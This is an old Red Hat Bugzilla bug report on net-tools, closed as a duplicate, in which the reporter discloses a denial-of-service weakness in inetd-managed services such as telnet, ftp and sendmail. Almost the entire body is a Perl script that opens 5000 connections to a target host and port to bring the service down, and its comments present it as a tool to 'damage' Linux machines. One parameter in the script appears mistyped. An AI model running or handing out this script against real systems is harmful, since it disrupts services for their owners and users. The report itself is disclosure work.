Bug 4004
| Summary: | need summary | ||
|---|---|---|---|
| Product: | [Retired] Red Hat Linux | Reporter: | jjuarez |
| Component: | net-tools | Assignee: | David Lawrence <dkl> |
| Status: | CLOSED DUPLICATE | QA Contact: | |
| Severity: | high | Docs Contact: | |
| Priority: | high | ||
| Version: | 6.0 | ||
| Target Milestone: | --- | ||
| Target Release: | --- | ||
| Hardware: | i386 | ||
| OS: | Linux | ||
| Whiteboard: | |||
| Fixed In Version: | Doc Type: | Bug Fix | |
| Doc Text: | Story Points: | --- | |
| Clone Of: | Environment: | ||
| Last Closed: | 1999-07-13 14:22:37 UTC | Type: | --- |
| Regression: | --- | Mount Type: | --- |
| Documentation: | --- | CRM: | |
| Verified Versions: | Category: | --- | |
| oVirt Team: | --- | RHEL 7.3 requirements from Atomic Host: | |
| Cloudforms Team: | --- | Target Upstream Version: | |
| Embargoed: | |||
#!/usr/bin/perl # Author: Jesus A. Juarez # Jul 1999 # e-mail: chuby # The Xploit attack to services under inetd daemon on the # Linux Box's, this cause the suspend of the services. # The problem is on the inetd, telnet, ftp & sendmail, etc; # daemon's, because this programs do not limit the number of # calls by client. This causes that the service requested # became down. # Use it under your own risk. # The TCP-WRAPPERS don't Fix this problem. # Sintax: # DoS-TFS.pl <hostname> <port> <enter> # DoS-Telnet, FTP, Sendmail, etc. # This code has beed tested from Linux to Linux Box's whith # Perl installed, I think' that it run the same way on # some Unix's or Windows System to damage some Linux Box's. use Net::Telnet; for ($i=0;$i<5000;$i++) { $obj=Net::Telnet->new( Host => "$ARGV[0]",Port > "$ARGV[1]"); my $cmd = "."; $obj->print("$cmd"); $obj->close; } #this problem will not be published. # please notify me, when fix it. :)